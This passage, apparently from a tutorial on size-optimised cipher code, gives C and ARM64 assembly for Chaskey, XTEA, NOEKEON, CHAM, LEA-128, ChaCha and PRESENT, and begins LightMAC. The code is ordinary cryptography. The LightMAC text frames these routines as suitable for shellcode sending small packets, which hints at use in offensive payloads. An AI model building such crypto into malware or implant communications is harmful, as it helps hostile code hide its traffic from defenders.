     ldp     w8, w7, [x1]
L0:
     // r ^= R(l,1) ^ (R(l,5) & l) ^ k0;
     eor     w9, w3, w7, ror 31
     and     w10, w7, w7, ror 27
     eor     w9, w9, w10
     mov     w10, w7
     eor     w7, w8, w9
     mov     w8, w10

     // t1 = (s & 1) - 4;
     // k0 ^= R(k1,1) ^ (R(k1,5) & k1) ^ t1;
     // X(k0,k1); X(k1,k2); X(k2,k3);
     eor     w3, w3, w4, ror 31
     and     w9, w4, w4, ror 27
     eor     w9, w9, w3
     mov     w3, w4
     mov     w4, w5
     mov     w5, w6
     and     x10, x2, 1
     sub     x10, x10, 4
     eor     w6, w9, w10

     // s >>= 1
     lsr     x2, x2, 1
     cbnz    x2, L0

     // save 64-bit ciphertext 
     stp     w8, w7, [x1]
     ret

7.8 CHASKEY

A block cipher designed by Nicky Mouha, Bart Mennink, Anthony Van Herrewege, Dai Watanabe, Bart Preneel and Ingrid Verbauwhede. Although Chaskey is specifically a MAC function, the underlying primitive is a block cipher. What you see below is only encryption. However, it is possible to implement decryption by running the steps of each round in reverse order, using rol and sub in place of ror and add.

Chaskey: An Efficient MAC Algorithm for 32-bit Microcontrollers

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)
  
void chaskey(void*mk,void*p){
  unsigned int i,*x=p,*k=mk;

  F(4)x[i]^=k[i];
  F(16)
    *x+=x[1],
    x[1]=R(x[1],27)^*x,
    x[2]+=x[3],
    x[3]=R(x[3],24)^x[2],
    x[2]+=x[1],
    *x=R(*x,16)+x[3],
    x[3]=R(x[3],19)^*x,
    x[1]=R(x[1],25)^x[2],
    x[2]=R(x[2],16);
  F(4)x[i]^=k[i];
}
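As a sketch of the inverse mentioned earlier, the round can be undone by walking its nine steps backwards, replacing each add with a sub and each rotate right with a rotate left. The function names chaskey_encrypt and chaskey_decrypt are chosen for this example only; the encryption is the same logic as chaskey() above, rewritten so the two can be compared side by side.

```c
#include <stdint.h>

static uint32_t rotr32(uint32_t v, unsigned n) { return (v >> n) | (v << (32 - n)); }
static uint32_t rotl32(uint32_t v, unsigned n) { return (v << n) | (v >> (32 - n)); }

// Same steps as chaskey() above.
static void chaskey_encrypt(const uint32_t k[4], uint32_t x[4]) {
    int i;

    for (i = 0; i < 4; i++) x[i] ^= k[i];
    for (i = 0; i < 16; i++) {
        x[0] += x[1];
        x[1]  = rotr32(x[1], 27) ^ x[0];
        x[2] += x[3];
        x[3]  = rotr32(x[3], 24) ^ x[2];
        x[2] += x[1];
        x[0]  = rotr32(x[0], 16) + x[3];
        x[3]  = rotr32(x[3], 19) ^ x[0];
        x[1]  = rotr32(x[1], 25) ^ x[2];
        x[2]  = rotr32(x[2], 16);
    }
    for (i = 0; i < 4; i++) x[i] ^= k[i];
}

// Hypothetical inverse: every step of the round undone in reverse order.
static void chaskey_decrypt(const uint32_t k[4], uint32_t x[4]) {
    int i;

    for (i = 0; i < 4; i++) x[i] ^= k[i];
    for (i = 0; i < 16; i++) {
        x[2]  = rotl32(x[2], 16);
        x[1]  = rotl32(x[1] ^ x[2], 25);
        x[3]  = rotl32(x[3] ^ x[0], 19);
        x[0]  = rotl32(x[0] - x[3], 16);
        x[2] -= x[1];
        x[3]  = rotl32(x[3] ^ x[2], 24);
        x[2] -= x[3];
        x[1]  = rotl32(x[1] ^ x[0], 27);
        x[0] -= x[1];
    }
    for (i = 0; i < 4; i++) x[i] ^= k[i];
}
```

Encrypting a block and then decrypting it with the same key should return the original four words.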
  
// CHASKEY in ARM64 assembly
// 112 bytes

  .arch armv8-a
  .text

  .global chaskey

  // chaskey(void*mk, void*data);
chaskey:
    // load 128-bit key
    ldp    w2, w3, [x0]
    ldp    w4, w5, [x0, 8]

    // load 128-bit plain text
    ldp    w6, w7, [x1]
    ldp    w8, w9, [x1, 8]

    // xor plaintext with key
    eor    w6, w6, w2          // x[0] ^= k[0];
    eor    w7, w7, w3          // x[1] ^= k[1];
    eor    w8, w8, w4          // x[2] ^= k[2];
    eor    w9, w9, w5          // x[3] ^= k[3];
    mov    w10, 16             // i = 16
L0:
    add    w6, w6, w7          // x[0] += x[1];
    eor    w7, w6, w7, ror 27  // x[1]=R(x[1],27) ^ x[0];
    add    w8, w8, w9          // x[2] += x[3];
    eor    w9, w8, w9, ror 24  // x[3]=R(x[3],24) ^ x[2];
    add    w8, w8, w7          // x[2] += x[1];
    ror    w6, w6, 16
    add    w6, w9, w6          // x[0]=R(x[0],16) + x[3];
    eor    w9, w6, w9, ror 19  // x[3]=R(x[3],19) ^ x[0];
    eor    w7, w8, w7, ror 25  // x[1]=R(x[1],25) ^ x[2];
    ror    w8, w8, 16          // x[2]=R(x[2],16);
    subs   w10, w10, 1         // i--
    bne    L0                  // i > 0

    // xor cipher text with key
    eor    w6, w6, w2          // x[0] ^= k[0];
    eor    w7, w7, w3          // x[1] ^= k[1];
    eor    w8, w8, w4          // x[2] ^= k[2];
    eor    w9, w9, w5          // x[3] ^= k[3];

    // save 128-bit cipher text
    stp    w6, w7, [x1]
    stp    w8, w9, [x1, 8]
    ret

7.9 XTEA

A block cipher designed by Roger Needham and David Wheeler. It was published in 1997 in response to weaknesses found in the Tiny Encryption Algorithm (TEA). Compared to its predecessor, XTEA has a more complex key schedule and a rearrangement of the shifts, XORs, and additions. The implementation here uses 32 rounds.

Tea Extensions

void xtea(void*mk,void*p){
  unsigned int t,r=65,s=0,*k=mk,*x=p;

  while(--r)
    t=x[1],
    x[1]=*x+=((((t<<4)^(t>>5))+t)^
    (s+k[((r&1)?s+=0x9E3779B9,
    s>>11:s)&3])),*x=t;
}

Although the round counter r is initialized to 65, only 32 rounds of encryption are performed: r is decremented before it is tested, and each of the 64 loop iterations is one half of a round. If 64 rounds were required, then r should be initialized to 129 (64*2+1). Perhaps it would make more sense to pass the number of rounds as a parameter, but this is simply for illustration.
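A version that takes the number of rounds as a parameter might look like the sketch below. The name xtea_rounds and its signature are assumptions for this example. It keeps the half-round loop of the compact code, but updates the sum in a separate statement before it is used, rather than inside the array index.

```c
#include <stdint.h>

// Hypothetical variant of xtea() that takes the number of rounds.
static void xtea_rounds(const uint32_t k[4], uint32_t x[2], unsigned rounds) {
    uint32_t sum = 0, t, idx;
    unsigned r;

    // each round consists of two half-rounds
    for (r = rounds * 2; r > 0; r--) {
        if (r & 1) {              // second half: advance the sum first
            sum += 0x9E3779B9u;
            idx = sum >> 11;
        } else {                  // first half: index with the current sum
            idx = sum;
        }
        t    = x[1];
        x[1] = x[0] + ((((t << 4) ^ (t >> 5)) + t) ^ (sum + k[idx & 3]));
        x[0] = t;                 // swap the halves
    }
}
```

Calling xtea_rounds(k, x, 32) should match the 32-round function above, and 64 rounds is simply xtea_rounds(k, x, 64).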

  
// XTEA in ARM64 assembly
// 92 bytes

    .arch armv8-a
    .text

    .equ ROUNDS, 32

    .global xtea

    // xtea(void*mk, void*data);
xtea:
    mov    w7, ROUNDS * 2

    // load 64-bit plain text
    ldp    w2, w4, [x1]         // x0  = x[0], x1 = x[1];
    mov    w3, wzr              // sum = 0;
    ldr    w5, =0x9E3779B9      // c   = 0x9E3779B9;
L0:
    mov    w6, w3               // t0 = sum;
    tbz    w7, 0, L1            // if ((i & 1)==0) goto L1;

    // the next 2 only execute if (i % 2) is not zero
    add    w3, w3, w5           // sum += 0x9E3779B9;
    lsr    w6, w3, 11           // t0 = sum >> 11
L1:
    and    w6, w6, 3            // t0 %= 4
    ldr    w6, [x0, x6, lsl 2]  // t0 = k[t0];
    add    w8, w3, w6           // t1 = sum + t0
    mov    w6, w4, lsl 4        // t0 = (x1 << 4)
    eor    w6, w6, w4, lsr 5    // t0^= (x1 >> 5)
    add    w6, w6, w4           // t0+= x1
    eor    w6, w6, w8           // t0^= t1
    mov    w8, w4               // backup x1
    add    w4, w6, w2           // x1 = t0 + x0

    // XCHG(x0, x1)
    mov    w2, w8               // x0 = x1
    subs   w7, w7, 1
    bne    L0                   // i > 0
    stp    w2, w4, [x1]
    ret

7.10 NOEKEON

A block cipher designed by Joan Daemen, Michaël Peeters, Gilles Van Assche and Vincent Rijmen.

Noekeon website

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))

void noekeon(void*mk,void*p){
  unsigned int a,b,c,d,t,*k=mk,*x=p;
  unsigned char rc=128;

  a=*x;b=x[1];c=x[2];d=x[3];

  for(;;) {
    a^=rc;t=a^c;t^=R(t,8)^R(t,24);
    b^=t;d^=t;a^=k[0];b^=k[1];
    c^=k[2];d^=k[3];t=b^d;
    t^=R(t,8)^R(t,24);a^=t;c^=t;
    if(rc==212)break;
    rc=((rc<<1)^((rc>>7)*27));
    b=R(b,31);c=R(c,27);d=R(d,30);
    b^=~((d)|(c));t=d;d=a^c&b;a=t;
    c^=a^b^d;b^=~((d)|(c));a^=c&b;
    b=R(b,1);c=R(c,5);d=R(d,2);
  }
  *x=a;x[1]=b;x[2]=c;x[3]=d;
}

NOEKEON can be implemented quite well for both INTEL and ARM architectures.

  
// NOEKEON in ARM64 assembly
// 212 bytes

    .arch armv8-a
    .text

    .global noekeon

noekeon:
    mov    x12, x1

    // load 128-bit key
    ldp    w4, w5, [x0]
    ldp    w6, w7, [x0, 8]

    // load 128-bit plain text
    ldp    w2, w3, [x1, 8]
    ldp    w0, w1, [x1]

    // c = 128
    mov    w8, 128
    mov    w9, 27
L0:
    // a^=rc;t=a^c;t^=R(t,8)^R(t,24);
    eor    w0, w0, w8
    eor    w10, w0, w2
    eor    w11, w10, w10, ror 8
    eor    w10, w11, w10, ror 24

    // b^=t;d^=t;a^=k[0];b^=k[1];
    eor    w1, w1, w10
    eor    w3, w3, w10
    eor    w0, w0, w4
    eor    w1, w1, w5

    // c^=k[2];d^=k[3];t=b^d;
    eor    w2, w2, w6
    eor    w3, w3, w7
    eor    w10, w1, w3

    // t^=R(t,8)^R(t,24);a^=t;c^=t;
    eor    w11, w10, w10, ror 8
    eor    w10, w11, w10, ror 24
    eor    w0, w0, w10
    eor    w2, w2, w10

    // if(rc==212)break;
    cmp    w8, 212
    beq    L1

    // rc=((rc<<1)^((rc>>7)*27));
    lsr    w10, w8, 7
    mul    w10, w10, w9
    eor    w8, w10, w8, lsl 1
    uxtb   w8, w8

    // b=R(b,31);c=R(c,27);d=R(d,30);
    ror    w1, w1, 31
    ror    w2, w2, 27
    ror    w3, w3, 30

    // b^=~(d|c);t=d;d=a^(c&b);a=t;
    orr    w10, w3, w2
    eon    w1, w1, w10
    mov    w10, w3
    and    w3, w2, w1
    eor    w3, w3, w0
    mov    w0, w10

    // c^=a^b^d;b^=~(d|c);a^=c&b;
    eor    w2, w2, w0
    eor    w2, w2, w1
    eor    w2, w2, w3
    orr    w10, w3, w2
    eon    w1, w1, w10
    and    w10, w2, w1
    eor    w0, w0, w10

    // b=R(b,1);c=R(c,5);d=R(d,2);
    ror    w1, w1, 1
    ror    w2, w2, 5
    ror    w3, w3, 2
    b      L0
L1:
    // *x=a;x[1]=b;x[2]=c;x[3]=d;
    stp    w0, w1, [x12]
    stp    w2, w3, [x12, 8]
    ret

7.11 CHAM

A block cipher designed by Bonwook Koo, Dongyoung Roh, Hyeonjin Kim, Younghoon Jung, Dong-Geon Lee, and Daesung Kwon.

CHAM: A Family of Lightweight Block Ciphers for Resource-Constrained Devices.

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)
typedef unsigned int W;

void cham(void*mk,void*p){
  W rk[8],*w=p,*k=mk,i,t;

  F(4)
    t=k[i]^R(k[i],31),
    rk[i]=t^R(k[i],24),
    rk[(i+4)^1]=t^R(k[i],21);
  F(80)
    t=w[3],w[0]^=i,w[3]=rk[i&7],
    w[3]^=R(w[1],(i&1)?24:31),
    w[3]+=w[0],
    w[3]=R(w[3],(i&1)?31:24),
    w[0]=w[1],w[1]=w[2],w[2]=t;
}

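This algorithm works better for 32-bit ARM, where conditional execution of almost all instructions is supported. On ARM64, both rotations are computed and CSEL picks the one required for the current round.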

  
// CHAM 128/128 in ARM64 assembly
// 160 bytes 

    .arch armv8-a
    .text
    .global cham

    // cham(void*mk,void*p);
cham:
    sub    sp, sp, 32
    mov    w2, wzr
    mov    x8, x1
L0:
    // t=k[i]^R(k[i],31),
    ldr    w5, [x0, x2, lsl 2]
    eor    w6, w5, w5, ror 31

    // rk[i]=t^R(k[i],24),
    eor    w7, w6, w5, ror 24
    str    w7, [sp, x2, lsl 2]

    // rk[(i+4)^1]=t^R(k[i],21);
    eor    w7, w6, w5, ror 21
    add    w5, w2, 4
    eor    w5, w5, 1
    str    w7, [sp, x5, lsl 2]

    // i++
    add    w2, w2, 1
    // i < 4
    cmp    w2, 4
    bne    L0

    ldp    w0, w1, [x8]
    ldp    w2, w3, [x8, 8]

    // i = 0
    mov    w4, wzr
L1:
    tst    w4, 1

    // t=w[3],w[0]^=i,w[3]=rk[i%8],
    mov    w5, w3
    eor    w0, w0, w4
    and    w6, w4, 7
    ldr    w3, [sp, x6, lsl 2]

    // w[3]^=R(w[1],(i & 1) ? 24 : 31),
    mov    w6, w1, ror 24
    mov    w7, w1, ror 31
    csel   w6, w6, w7, ne
    eor    w3, w3, w6

    // w[3]+=w[0],
    add    w3, w3, w0

    // w[3]=R(w[3],(i & 1) ? 31 : 24),
    mov    w6, w3, ror 31
    mov    w7, w3, ror 24
    csel   w3, w6, w7, ne

    // w[0]=w[1],w[1]=w[2],w[2]=t;
    mov    w0, w1
    mov    w1, w2
    mov    w2, w5

    // i++ 
    add    w4, w4, 1
    // i < 80
    cmp    w4, 80
    bne    L1

    stp    w0, w1, [x8]
    stp    w2, w3, [x8, 8]
    add    sp, sp, 32
    ret

7.12 LEA-128

A block cipher designed by Deukjo Hong, Jung-Keun Lee, Dong-Chan Kim, Daesung Kwon, Kwon Ho Ryu, and Dong-Geon Lee.

LEA: A 128-Bit Block Cipher for Fast Encryption on Common Processors

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
typedef unsigned int W;

void lea128(void*mk,void*p){
  W r,t,*w=p,*k=mk;
  W c[4]=
    {0xc3efe9db,0x88c4d604,
     0xe789f229,0xc6f98763};

  for(r=0;r<24;r++){
    t=c[r%4];
    c[r%4]=R(t,28);
    k[0]=R(k[0]+t,31);
    k[1]=R(k[1]+R(t,31),29);
    k[2]=R(k[2]+R(t,30),26);
    k[3]=R(k[3]+R(t,29),21);
    t=w[0];
    w[0]=R((w[0]^k[0])+(w[1]^k[1]),23);
    w[1]=R((w[1]^k[2])+(w[2]^k[1]),5);
    w[2]=R((w[2]^k[3])+(w[3]^k[1]),3);
    w[3]=t;
  }
}

Everything here is very straightforward: the cipher uses only add, rotate and XOR operations.
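One detail that is easy to miss is where the four constants in c[] come from. As far as I can tell, they are the first four key-schedule constants of the LEA specification, each pre-rotated left by its index, so that round r finds its constant already rotated by r. The sketch below rebuilds the table under that assumption; `lea_delta` and `lea_init_constants` are names I made up for illustration.

```c
#include <stdint.h>

/* Rotate a 32-bit word left by n bits; n == 0 is handled separately. */
static uint32_t rol32(uint32_t v, unsigned n) {
    n &= 31;
    return n ? (v << n) | (v >> (32 - n)) : v;
}

/* First four key-schedule constants, as I read them from the LEA spec. */
static const uint32_t lea_delta[4] = {
    0xc3efe9dbu, 0x44626b02u, 0x79e27c8au, 0x78df30ecu
};

/* Fill c[] with the starting values used by the compact code:
   c[i] = ROL(delta[i], i), the form in which round i first needs it. */
static void lea_init_constants(uint32_t c[4]) {
    for (unsigned i = 0; i < 4; i++)
        c[i] = rol32(lea_delta[i], i);
}
```

After each use the compact code rotates the constant by a further four bits (R(t,28)), which keeps the rotation in step with the round number.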

// LEA-128/128 in ARM64 assembly
// 224 bytes

    .arch armv8-a

    // include the MOVL macro
    .include "../../include.inc"

    .text
    .global lea128

lea128:
    mov    x11, x0
    mov    x12, x1

    // allocate 16 bytes
    sub    sp, sp, 4*4

    // load immediate values
    movl   w0, 0xc3efe9db
    movl   w1, 0x88c4d604
    movl   w2, 0xe789f229
    movl   w3, 0xc6f98763

    // store on stack
    str    w0, [sp    ]
    str    w1, [sp,  4]
    str    w2, [sp,  8]
    str    w3, [sp, 12]

    // for(r=0;r<24;r++) {
    mov    w8, wzr

    // load 128-bit key
    ldp    w4, w5, [x11]
    ldp    w6, w7, [x11, 8]

    // load 128-bit plaintext
    ldp    w0, w1, [x12]
    ldp    w2, w3, [x12, 8]
L0:
    // t=c[r%4];
    and    w9, w8, 3
    ldr    w10, [sp, x9, lsl 2]

    // c[r%4]=R(t,28);
    mov    w11, w10, ror 28
    str    w11, [sp, x9, lsl 2]

    // k[0]=R(k[0]+t,31);
    add    w4, w4, w10
    ror    w4, w4, 31

    // k[1]=R(k[1]+R(t,31),29);
    ror    w11, w10, 31
    add    w5, w5, w11
    ror    w5, w5, 29

    // k[2]=R(k[2]+R(t,30),26);
    ror    w11, w10, 30
    add    w6, w6, w11
    ror    w6, w6, 26

    // k[3]=R(k[3]+R(t,29),21);
    ror    w11, w10, 29
    add    w7, w7, w11
    ror    w7, w7, 21

    // t=w[0];
    mov    w10, w0

    // w[0]=R((w[0]^k[0])+(w[1]^k[1]),23);
    eor    w0, w0, w4
    eor    w9, w1, w5
    add    w0, w0, w9
    ror    w0, w0, 23

    // w[1]=R((w[1]^k[2])+(w[2]^k[1]),5);
    eor    w1, w1, w6
    eor    w9, w2, w5
    add    w1, w1, w9
    ror    w1, w1, 5

    // w[2]=R((w[2]^k[3])+(w[3]^k[1]),3);
    eor    w2, w2, w7
    eor    w3, w3, w5
    add    w2, w2, w3
    ror    w2, w2, 3

    // w[3]=t;
    mov    w3, w10

    // r++
    add    w8, w8, 1
    // r < 24
    cmp    w8, 24
    bne    L0

    // save 128-bit ciphertext
    stp    w0, w1, [x12]
    stp    w2, w3, [x12, 8]

    add    sp, sp, 4*4
    ret

7.13 CHACHA

A stream cipher designed by Daniel Bernstein and published in 2008. Together with Poly1305 for authentication, it has become a drop-in replacement for AES-128-GCM on handheld devices where native AES instructions are unavailable. The version implemented here is based on the description in RFC 8439, which uses a 256-bit key, a 32-bit counter and a 96-bit nonce.

The ChaCha family of stream ciphers.

ChaCha20 and Poly1305 for IETF Protocols

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)
#define X(a,b)(t)=(a),(a)=(b),(b)=(t)
typedef unsigned int W;

void P(W*s,W*x){
    W a,b,c,d,i,t,r;
    W v[8]={0xC840,0xD951,0xEA62,0xFB73,
            0xFA50,0xCB61,0xD872,0xE943};
            
    F(16)x[i]=s[i];
    
    F(80) {
      d=v[i%8];
      a=(d&15);b=(d>>4&15);
      c=(d>>8&15);d>>=12;
      
      for(r=0x19181410;r;r>>=8)
        x[a]+=x[b],
        x[d]=R(x[d]^x[a],(r&255)),
        X(a,c),X(b,d);
    }
    F(16)x[i]+=s[i];
    s[12]++;
}
void chacha(W l,void*in,void*state){
    unsigned char c[64],*p=in;
    W i,r,*s=state,*k=in;

    if(l) {
      while(l) {
        P(s,(W*)c);
        r=(l>64)?64:l;
        F(r)*p++^=c[i];
        l-=r;
      }
    } else {
      s[0]=0x61707865;s[1]=0x3320646E;
      s[2]=0x79622D32;s[3]=0x6B206574;
      F(12)s[i+4]=k[i];
    }
}

The permutation function makes use of the UBFX (unsigned bit-field extract) instruction to unpack the four 4-bit indices stored in each entry of v.
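To make the packing concrete, here is a small C sketch of a single quarter round driven by one packed entry of v. The `ubfx` helper mimics the instruction of the same name, and `quarter_round` is a hypothetical wrapper around the inner loop of P; neither exists in the original code.

```c
#include <stdint.h>

/* Extract `width` bits starting at bit `lsb`, like the A64 UBFX instruction. */
static uint32_t ubfx(uint32_t v, unsigned lsb, unsigned width) {
    return (v >> lsb) & ((1u << width) - 1u);
}

static uint32_t ror32(uint32_t v, unsigned n) {
    return (v >> n) | (v << (32 - n));
}

/* One quarter round on x[], with the four indices packed into a
   16-bit word as in the v[] table (a in bits 0-3, d in bits 12-15). */
static void quarter_round(uint32_t x[16], uint32_t packed) {
    uint32_t a = ubfx(packed, 0, 4), b = ubfx(packed, 4, 4);
    uint32_t c = ubfx(packed, 8, 4), d = ubfx(packed, 12, 4);
    uint32_t r, t;

    /* 0x19181410 holds the right-rotation counts 16, 20, 24 and 25,
       which are left rotations by 16, 12, 8 and 7. */
    for (r = 0x19181410u; r; r >>= 8) {
        x[a] += x[b];
        x[d] = ror32(x[d] ^ x[a], r & 255);
        t = a; a = c; c = t;    /* swap roles so the next step updates c and b */
        t = b; b = d; d = t;
    }
}
```

For example, the entry 0xC840 selects the column (0, 4, 8, 12), and feeding it the quarter-round test vector from RFC 8439 section 2.1.1 reproduces the values given there.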

// ChaCha in ARM64 assembly 
// 348 bytes

 .arch armv8-a
 .text
 .global chacha

 .include "../../include.inc"

P:
    adr     x13, cc_v

    // F(16)x[i]=s[i];
    mov     x8, 0
P0:
    ldr     w14, [x2, x8, lsl 2]
    str     w14, [x3, x8, lsl 2]

    add     x8, x8, 1
    cmp     x8, 16
    bne     P0

    mov     x8, 0
P1:
    // d=v[i%8];
    and     w12, w8, 7
    ldrh    w12, [x13, x12, lsl 1]

    // a=(d&15);b=(d>>4&15);
    // c=(d>>8&15);d>>=12;
    ubfx    w4, w12, 0, 4
    ubfx    w5, w12, 4, 4
    ubfx    w6, w12, 8, 4
    ubfx    w7, w12, 12, 4

    movl    w10, 0x19181410
P2:
    // x[a]+=x[b],
    ldr     w11, [x3, x4, lsl 2]
    ldr     w12, [x3, x5, lsl 2]
    add     w11, w11, w12
    str     w11, [x3, x4, lsl 2]

    // x[d]=R(x[d]^x[a],(r&255)),
    ldr     w12, [x3, x7, lsl 2]
    eor     w12, w12, w11
    and     w14, w10, 255
    ror     w12, w12, w14
    str     w12, [x3, x7, lsl 2]

    // X(a,c),X(b,d);
    stp     w4, w6, [sp, -16]!
    ldp     w6, w4, [sp], 16
    stp     w5, w7, [sp, -16]!
    ldp     w7, w5, [sp], 16

    // r >>= 8
    lsr    w10, w10, 8
    cbnz   w10, P2

    // i++
    add    x8, x8, 1
    // i < 80
    cmp    x8, 80
    bne    P1

    // F(16)x[i]+=s[i];
    mov    x8, 0
P3:
    ldr    w11, [x2, x8, lsl 2]
    ldr    w12, [x3, x8, lsl 2]
    add    w11, w11, w12
    str    w11, [x3, x8, lsl 2]

    add    x8, x8, 1
    cmp    x8, 16
    bne    P3

    // s[12]++;
    ldr    w11, [x2, 12*4]
    add    w11, w11, 1
    str    w11, [x2, 12*4]
    ret
cc_v:
    .2byte 0xC840, 0xD951, 0xEA62, 0xFB73
    .2byte 0xFA50, 0xCB61, 0xD872, 0xE943

    // void chacha(int l, void *in, void *state);
chacha:
    str    x30, [sp, -96]!
    cbz    x0, L2

    add    x3, sp, 16

    mov    x9, 64
L0:
    // P(s,(W*)c);
    bl     P

    // r=(l > 64) ? 64 : l;
    cmp    x0, 64
    csel   x10, x0, x9, ls

    // F(r)*p++^=c[i];
    mov    x8, 0
L1:
    ldrb   w11, [x3, x8]
    ldrb   w12, [x1]
    eor    w11, w11, w12
    strb   w11, [x1], 1

    add    x8, x8, 1
    cmp    x8, x10
    bne    L1

    // l-=r;
    subs   x0, x0, x10
    bne    L0
    beq    L4
L2:
    // s[0]=0x61707865;s[1]=0x3320646E;
    movl   w11, 0x61707865
    movl   w12, 0x3320646E
    stp    w11, w12, [x2]

    // s[2]=0x79622D32;s[3]=0x6B206574;
    movl   w11, 0x79622D32
    movl   w12, 0x6B206574
    stp    w11, w12, [x2, 8]

    // F(12)s[i+4]=k[i];
    mov    x8, 16
    sub    x1, x1, 16
L3:
    ldr    w11, [x1, x8]
    str    w11, [x2, x8]
    add    x8, x8, 4
    cmp    x8, 64
    bne    L3
L4:
    ldr    x30, [sp], 96
    ret

7.14 PRESENT

A block cipher designed specifically for hardware and published in 2007. Why implement a hardware cipher? PRESENT is a 64-bit block cipher that can be implemented reasonably well on any 64-bit architecture. The data and key are byte-swapped with the REV instruction before being processed; stripping this out should not affect the security of the cipher.

PRESENT: An Ultra-Lightweight Block Cipher

#define R(v,n)(((v)>>(n))|((v)<<(64-(n))))
#define F(a,b)for(a=0;a<b;a++)

typedef unsigned long long W;
typedef unsigned char B;

B sbox[16] =
  {0xc,0x5,0x6,0xb,0x9,0x0,0xa,0xd,
   0x3,0xe,0xf,0x8,0x4,0x7,0x1,0x2 };

B S(B x) {
  return (sbox[(x&0xF0)>>4]<<4)|sbox[(x&0x0F)];
}

#define rev __builtin_bswap64

void present(void*mk,void*data) {
    W i,j,r,p,t,t2,k0,k1,*k=(W*)mk,*x=(W*)data;
    
    k0=rev(k[0]); k1=rev(k[1]);t=rev(x[0]);
  
    F(i,32-1) {
      p=t^k0;
      F(j,8)((B*)&p)[j]=S(((B*)&p)[j]);
      t=0;r=0x0030002000100000;
      F(j,64)
        t|=((p>>j)&1)<<(r&255),
        r=R(r+1,16);
      p =(k0<<61)|(k1>>3);
      k1=(k1<<61)|(k0>>3);
      p=R(p,56);
      ((B*)&p)[0]=S(((B*)&p)[0]);
      k0=R(p,8)^((i+1)>>2);
      k1^=(((i+1)& 3)<<62);
    }
    x[0] = rev(t^k0);
}

The sbox lookup routine (S) uses UBFX and BFI in place of LSR, LSL, AND and ORR. Because the source uses #define for its register names, it requires preprocessing with cpp -E before assembly.
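The bit permutation in the C code is compact enough to be a little cryptic. The counter r holds four 16-bit lanes (0, 16, 32, 48); each step reads the low lane as the destination bit, bumps it by one, and rotates to the next lane. The sketch below checks that this matches the textbook rule for PRESENT, where bit j moves to 16*j mod 63 and bit 63 stays where it is. The helper names are mine.

```c
#include <stdint.h>

static uint64_t ror64(uint64_t v, unsigned n) {
    return (v >> n) | (v << (64 - n));
}

/* Textbook rule: bit j moves to 16*j mod 63, and bit 63 stays put. */
static unsigned p_textbook(unsigned j) {
    return j == 63 ? 63 : (16 * j) % 63;
}

/* Apply the bit permutation with the rotating-counter trick from the
   C source: the low byte of r is the destination of the current bit. */
static uint64_t p_layer(uint64_t p) {
    uint64_t t = 0, r = 0x0030002000100000ULL;
    for (unsigned j = 0; j < 64; j++) {
        t |= ((p >> j) & 1) << (r & 255);
        r = ror64(r + 1, 16);
    }
    return t;
}
```

The assembly uses the same idea with four 8-bit lanes in a 32-bit register (0x30201000, rotated by 8), which works because no lane ever exceeds 63.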

// PRESENT in ARM64 assembly
// 224 bytes

    .arch armv8-a
    .text
    .global present

    #define k  x0
    #define x  x1
    #define r  w2
    #define p  x3
    #define t  x4
    #define k0 x5
    #define k1 x6
    #define i  x7
    #define j  x8
    #define s  x9

present:
    str     lr, [sp, -16]!

    // k0=k[0];k1=k[1];t=x[0];
    ldp     k0, k1, [k]
    ldr     t, [x]

    // only dinosaurs use big endian convention
    rev     k0, k0
    rev     k1, k1
    rev     t, t

    mov     i, 0
    adr     s, sbox
L0:
    // p=t^k0;
    eor     p, t, k0

    // F(j,8)((B*)&p)[j]=S(((B*)&p)[j]);
    mov     j, 8
L1:
    bl      S
    ror     p, p, 8
    subs    j, j, 1
    bne     L1

    // t=0;r=0x30201000; (four 8-bit lanes; the C code uses 16-bit lanes)
    mov     t, 0
    ldr     r, =0x30201000
    // F(j,64)
    mov     j, 0
L2:
    // t|=((p>>j)&1)<<(r&255),
    lsr     x10, p, j         // x10 = p >> j
    and     x10, x10, 1       // x10 &= 1
    lsl     x10, x10, x2      // x10 <<= r (only the low 6 bits of x2 are used)
    orr     t, t, x10         // t |= x10

    // r=R(r+1,8);
    add     r, r, 1           // r = r + 1
    ror     r, r, 8           // r = R(r, 8)

    add     j, j, 1           // j++
    cmp     j, 64             // j < 64
    bne     L2

    // p =(k0<<61)|(k1>>3);
    lsr     p, k1, 3
    orr     p, p, k0, lsl 61

    // k1=(k1<<61)|(k0>>3);
    lsr     k0, k0, 3
    orr     k1, k0, k1, lsl 61

    // p=R(p,56);
    ror     p, p, 56
    bl      S

    // i++
    add     i, i, 1

    // k0=R(p,8)^((i+1)>>2);
    lsr     x10, i, 2
    eor     k0, x10, p, ror 8

    // k1^= (((i+1)&3)<<62);
    and     x10, i, 3
    eor     k1, k1, x10, lsl 62

    // i < 31
    cmp     i, 31
    bne     L0

    // x[0] = rev(t^k0);
    eor     p, t, k0
    rev     p, p
    str     p, [x]

    ldr     lr, [sp], 16
    ret

S:
    ubfx    x10, p, 0, 4              // x10 = (p & 0x0F)
    ubfx    x11, p, 4, 4              // x11 = (p & 0xF0) >> 4

    ldrb    w10, [s, w10, uxtw 0]     // w10 = s[w10]
    ldrb    w11, [s, w11, uxtw 0]     // w11 = s[w11]

    bfi     p, x10, 0, 4              // p[0] = ((x11 << 4) | x10)
    bfi     p, x11, 4, 4

    ret
sbox:
    .byte 0xc, 0x5, 0x6, 0xb, 0x9, 0x0, 0xa, 0xd
    .byte 0x3, 0xe, 0xf, 0x8, 0x4, 0x7, 0x1, 0x2

7.15 LIGHTMAC

A Message Authentication Code built from a block cipher. Designed by Atul Luykx, Bart Preneel, Elmar Tischhauser, and Kan Yasuda. The version shown here only supports ciphers with a 64-bit block size and a 128-bit key. E is defined as the block cipher; for this code, one could use XTEA, SPECK-64/128 or PRESENT. If BLK_LEN and TAG_LEN are changed to 16, it will support 128-bit ciphers like AES-128, CHASKEY, CHAM-128/128, SPECK-128/256, LEA-128 and NOEKEON. With the parameters used here, the largest message length is 1,792 bytes. For shellcode transmitting small packets, this should be sufficient.

A MAC Mode for Lightweight Block Ciphers

To improve upon the parameters used for 64-bit block ciphers, read the following paper.

Blockcipher-based MACs: Beyond the Birthday Bound without Message Length

#define CTR_LEN     1 // 8-bits
#define BLK_LEN     8 // 64-bits
#define TAG_LEN     8 // 64-bits
#define BC_KEY_LEN 16 // 128-bits

#define M_LEN       (BLK_LEN-CTR_LEN)

void present(void*mk,void*data);
#define E present

